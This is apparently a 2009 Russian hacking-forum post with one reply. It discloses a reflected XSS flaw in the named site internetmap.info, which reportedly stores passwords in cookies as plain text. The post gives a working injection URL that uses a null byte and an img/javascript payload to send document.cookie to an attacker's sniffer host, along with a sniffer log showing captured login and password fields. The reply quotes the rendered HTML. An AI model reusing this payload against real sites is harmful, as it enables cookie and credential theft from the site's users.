internetmap.info XSS Достаточно крупный проект. Пароли в куках там хранятся в чистом виде. При отправки на сниффер будет иметь вид: Code: Запрос с www.internetmap.info — 24.02.2009 16:35 IP: **.**.**.** (whois) QUERY: b=b; login=[COLOR=Red][email protected][/COLOR]; password=[COLOR=Red]Pass[/COLOR]; b=b REFERER: http://www.internetmap.info/cgi-bin/engine.cgi?a=%00%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22http://www*.com/s/s.gif?%22%2bdocument.cookie%3b'%3E&i=designers&f=works AGENT: Opera/10.00 (Windows NT 5.1; U; en) Presto/2.2.0 Скрипт декодить URL, обрезает спецсимволы (; в том числе). Формируем иньекцию: Code: [B] [COLOR=DimGray]http://www.internetmap.info/cgi-bin/engine.cgi?a=[/COLOR][COLOR=Red]%00[/COLOR][COLOR=YellowGreen]%3Cimg%20src='javascript:img%20=%20new%20Image()%3b%20img.src%20=%20%22[/COLOR][COLOR=Red]http://снифер/s/s.gif[/COLOR]?[COLOR=YellowGreen]%22%2bdocument.cookie%3b'%3E&i=designers&f=works[/COLOR][/B] © Dimi4, 2009
хтмл код полученный в результате прохожа по этому урл Code: a=_<img src='javascript:img = new Image()%3 b img.src = "http://sniff.com/sniff.jpg?"+document.cookie;'> помоему здесь что-то не так хДДДД
